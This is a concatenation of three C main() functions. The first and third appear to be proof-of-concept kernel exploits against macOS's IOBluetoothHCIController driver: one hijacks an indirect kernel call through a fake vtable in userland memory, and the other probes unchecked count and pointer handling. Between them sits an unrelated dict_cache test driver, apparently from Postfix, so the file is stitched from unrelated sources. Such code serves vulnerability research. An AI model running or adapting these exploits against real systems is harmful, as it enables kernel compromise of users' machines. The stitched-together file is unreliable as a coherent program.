/*
 * Proof-of-concept driver for the IOBluetoothHCIController user client.
 *
 * Builds one BluetoothCall request (passed as a 120-byte input struct to
 * selector 0), opens the driver's user client, primes it via
 * create_requests(), and issues request index 42, which the comment below
 * attributes to IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey().
 * The assembly comments on the pointer stores describe the driver-side
 * access pattern being exercised: a userland address placed in the request
 * is read back and dereferenced by the kernel handler. That trust in a
 * caller-supplied pointer is the memory-safety defect under test; the
 * driver-side mitigation is to validate or copy in request contents instead
 * of following userland addresses.
 *
 * Resource handling is PoC-grade: none of the calloc()ed buffers are freed,
 * and the early-return paths do no cleanup.
 *
 * Returns -1 if the service is not found, the IOServiceOpen() error code on
 * open failure, otherwise the result of IOServiceClose().
 */
int main(void) {
    struct BluetoothCall a;
    int i;
    /* Userland page whose address is handed to the driver; its contents are
     * laid out below. Assumes SIZE > 0x1d0 + 8 so the store at +0x1d0 stays
     * in bounds -- SIZE is defined outside this listing, confirm. */
    void *landing_page = calloc(SIZE, sizeof(char));

    /* Init a: every argument slot gets its own zeroed SIZE-byte buffer.
     * The buffers are never freed (PoC). */
    for (i = 0; i < 7; i++) {
        a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
        a.sizes[i] = SIZE;
    }

    /* Finding vuln service */
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
    if (!service) {
        return -1;
    }

    /* Connect to vuln service */
    io_connect_t port = (io_connect_t) 0;
    kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
    IOObjectRelease(service);
    if (kr != kIOReturnSuccess) {
        return kr;
    }

    /* Populating with fake requests. create_requests() is defined elsewhere
     * in the file; its effect on driver state is not visible here. */
    create_requests(port);

    /* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */
    a.index = 42;
    /* Req number */
    *((uint32_t *)a.args[0]) = 1;
    /* num_of_keys */
    *((uint32_t *)a.args[1]) = 0x20;
    /* Padding */
    memset((void *)a.args[3], 0x33, 152);
    /* mov rdi, [r14+0AB8h]
     * The userland address is stored byte-swapped; presumably the driver
     * swaps it back before use -- confirm against the handler. */
    *((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page);
    /* mov rax, [rdi]: first qword of the page points back at the page. */
    *((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page;
    /* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242
     * (a non-canonical marker address, so the PoC only demonstrates control
     * of the indirect call target; it does not continue past the fault). */
    *((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242;
    /* Here some fixing to the vtable is required to return cleanly after the exploit */

#if 0
    /* Debug print: hex-dump the 120 bytes of the request struct as sent.
     * Disabled (dead code); a DEBUG build flag would be the usual switch. */
    for(i = 0; i < 120; i++) {
        if(i % 8 == 0) printf("\n");
        printf("\\x%02x", ((unsigned char *)&a)[i]);
    }
    printf("\n");
#endif

    /* The 120-byte inputStructCnt is assumed to equal sizeof a; the struct
     * definition is outside this listing -- confirm the layout matches. */
    kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
                             (uint32_t) 0, /* Selector */
                             NULL, 0, /* input, inputCnt */
                             (const void*) &a, /* inputStruct */
                             120, /* inputStructCnt */
                             NULL, NULL, NULL, NULL); /* Output stuff */
    printf("kr: %08x\n", kr);
    return IOServiceClose(port);
}
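/*
 * Interactive test driver for the dict_cache module.
 *
 * Reads one command per line from standard input. A "> " prompt is shown on
 * a terminal; when input is not a terminal the command itself is echoed
 * after the prompt so transcripts are self-describing. Lines starting with
 * '#' are ignored. Recognized commands:
 *
 *   verbose N        set msg_verbose
 *   elapsed N        set show_elapsed
 *   lmdb_map_size N  set dict_lmdb_map_size (only when built with HAS_LMDB)
 *   cache PATH       (re)open the cache under test, closing any previous one
 *   reset            discard queued requests
 *   run              execute queued requests against the current cache
 *   status           report request/cache state
 *
 * Any other line is handed to add_request() as a queued request.
 *
 * The program accepts no command-line arguments; usage() is called
 * otherwise. Returns 0 after EOF on standard input.
 */
int main(int argc, char **argv)
{
    DICT_CACHE_TEST *test_job;
    VSTRING *inbuf = vstring_alloc(100);
    char   *bufp;
    ARGV   *args;
    DICT_CACHE *cache = 0;
    int     stdin_is_tty;

    msg_vstream_init(argv[0], VSTREAM_ERR);
    if (argc != 1) {
	usage(argv[0]);
    }
    test_job = create_requests(DICT_CACHE_SREQ_LIMIT);
    stdin_is_tty = isatty(0);

    for (;;) {
	if (stdin_is_tty) {
	    vstream_printf("> ");
	    vstream_fflush(VSTREAM_OUT);
	}
	if (vstring_fgets_nonl(inbuf, VSTREAM_IN) == 0) {
	    break;
	}
	bufp = vstring_str(inbuf);
	if (!stdin_is_tty) {
	    /* Echo the command so a piped transcript shows what ran. */
	    vstream_printf("> %s\n", bufp);
	    vstream_fflush(VSTREAM_OUT);
	}
	if (*bufp == '#') {
	    continue;
	}
	args = argv_split(bufp, DELIMS);

	/*
	 * Guard against an empty (or all-delimiter) line. The original test
	 * compared main()'s argc, which is always 1 after the check above, so
	 * this branch never fired and the strcmp() dispatch below read
	 * args->argv[0] with no command present. The ARGV must also be
	 * released before restarting the loop, or it leaks.
	 */
	if (args->argc == 0) {
	    vstream_printf("usage: %s\n", USAGE);
	    vstream_fflush(VSTREAM_OUT);
	    argv_free(args);
	    continue;
	}

	if (strcmp(args->argv[0], "verbose") == 0 && args->argc == 2) {
	    msg_verbose = atoi(args->argv[1]);
	} else if (strcmp(args->argv[0], "elapsed") == 0 && args->argc == 2) {
	    show_elapsed = atoi(args->argv[1]);
#ifdef HAS_LMDB
	} else if (strcmp(args->argv[0], "lmdb_map_size") == 0 && args->argc == 2) {
	    dict_lmdb_map_size = atol(args->argv[1]);
#endif
	} else if (strcmp(args->argv[0], "cache") == 0 && args->argc == 2) {
	    /* Close the previous cache first so only one is ever open. */
	    if (cache) {
		dict_cache_close(cache);
	    }
	    cache = dict_cache_open(args->argv[1], O_CREAT | O_RDWR,
				    DICT_CACHE_OPEN_FLAGS);
	} else if (strcmp(args->argv[0], "reset") == 0 && args->argc == 1) {
	    reset_requests(test_job);
	} else if (strcmp(args->argv[0], "run") == 0 && args->argc == 1) {
	    run_requests(test_job, cache, inbuf);
	} else if (strcmp(args->argv[0], "status") == 0 && args->argc == 1) {
	    show_status(test_job, cache);
	} else {
	    /* Anything else is a request specification for the queue. */
	    add_request(test_job, args);
	}
	vstream_fflush(VSTREAM_OUT);
	argv_free(args);
    }

    vstring_free(inbuf);
    free_requests(test_job);
    if (cache) {
	dict_cache_close(cache);
    }
    return (0);
}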
/*
 * Proof-of-concept driver for the IOBluetoothHCIController user client,
 * exercising the current-IAC (inquiry access code) write and read paths.
 *
 * Builds one BluetoothCall request (sent as a 120-byte input struct to
 * selector 0), opens the driver's user client, primes it via
 * create_requests(), then issues request index 80 (the comment below names
 * DispatchHCIBluetoothHCIWriteCurrentIACLAP) followed by index 79
 * (DispatchHCIBluetoothHCIReadCurrentIACLAP). Both requests carry, in
 * args[1], a userland struct that itself contains a userland pointer
 * (codes.codes) and a caller-chosen count; whether the driver validates
 * that count against the supplied buffer is the property being probed.
 *
 * Resource handling is PoC-grade: the per-slot buffers, the codes array,
 * and the slot-1 buffer that is overwritten by &codes are never freed, and
 * the early-return paths do no cleanup.
 *
 * Returns -1 if the service is not found, the IOServiceOpen() error code on
 * open failure, otherwise 0 (the IOServiceClose() result is ignored).
 */
int main(void) {
    BluetoothCall a;
    BluetoothHCICurrentInquiryAccessCodes codes;
    BluetoothHCICurrentInquiryAccessCode *buffer;
    int i = 0;

    /* Init a: every argument slot gets its own zeroed SIZE-byte buffer.
     * SIZE and BluetoothCall are defined outside this listing. */
    for (i = 0; i < 7; i++) {
        a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
        a.sizes[i] = SIZE;
    }

    /* Finding vuln service */
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
    if (!service) {
        return -1;
    }

    /* Connect to vuln service */
    io_connect_t port = (io_connect_t) 0;
    kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
    IOObjectRelease(service);
    if (kr != kIOReturnSuccess) {
        return kr;
    }

    /* create_requests() is defined elsewhere in the file; its effect on
     * driver state is not visible here. */
    printf(" [+] populating ...\n");
    create_requests(port);
    printf(" [+] done!\n");

    /* DispatchHCIBluetoothHCIWriteCurrentIACLAP() */
    a.index = 80;
    /* Params */
    *((uint32_t *)a.args[0]) = 100; /* Req number */
    /* count matches the 0x10 entries allocated below; the driver is handed
     * the userland address of that array inside the codes struct. */
    codes.count = 0x10;
    buffer = calloc(0x10, sizeof(BluetoothHCICurrentInquiryAccessCode));
    codes.codes = buffer;
    /* Slot 1 now points at the stack-resident codes struct; the SIZE-byte
     * buffer allocated for it in the init loop is leaked. */
    a.args[1] = (uint64_t) &codes;
    a.sizes[1] = sizeof(codes);

#ifdef DEBUG
    /* Hex-dump the 120 bytes of the request struct as sent. */
    for(i = 0; i < 120; i++) {
        if(i % 8 == 0) printf("\n");
        printf("\\x%02x", ((unsigned char *)&a)[i]);
    }
    printf("\n");
#endif

    printf(" [+] Calling DispatchHCIBluetoothHCIWriteCurrentIACLAP()\n");
    /* The 120-byte inputStructCnt is assumed to equal sizeof a -- confirm
     * against the BluetoothCall definition. */
    kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
                             (uint32_t) 0, /* Selector */
                             NULL, 0, /* input, inputCnt */
                             (const void*) &a, /* inputStruct */
                             120, /* inputStructCnt */
                             NULL, NULL, NULL, NULL); /* Output stuff */
    printf(" [+] kr: %x\n", kr);

    /* DispatchHCIBluetoothHCIReadCurrentIACLAP(): same codes struct,
     * re-sent so the read lands in the buffer just written. */
    a.index = 79;
    /* Params */
    *((uint32_t *)a.args[0]) = 100; /* Request Number */
    a.args[1] = (uint64_t) &codes;
    a.sizes[1] = sizeof(codes);

#ifdef DEBUG
    /* Hex-dump the 120 bytes of the request struct as sent. */
    for(i = 0; i < 120; i++) {
        if(i % 8 == 0) printf("\n");
        printf("\\x%02x", ((unsigned char *)&a)[i]);
    }
    printf("\n");
#endif

    printf(" [+] Calling DispatchHCIBluetoothHCIReadCurrentIACLAP()\n");
    kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
                             (uint32_t) 0, /* Selector */
                             NULL, 0, /* input, inputCnt */
                             (const void*) &a, /* inputStruct */
                             120, /* inputStructCnt */
                             NULL, NULL, NULL, NULL); /* Output stuff */
    printf(" [+] kr: %x\n", kr);

    /* Close result is discarded; the buffers above are not freed (PoC). */
    IOServiceClose(port);
    return 0;
}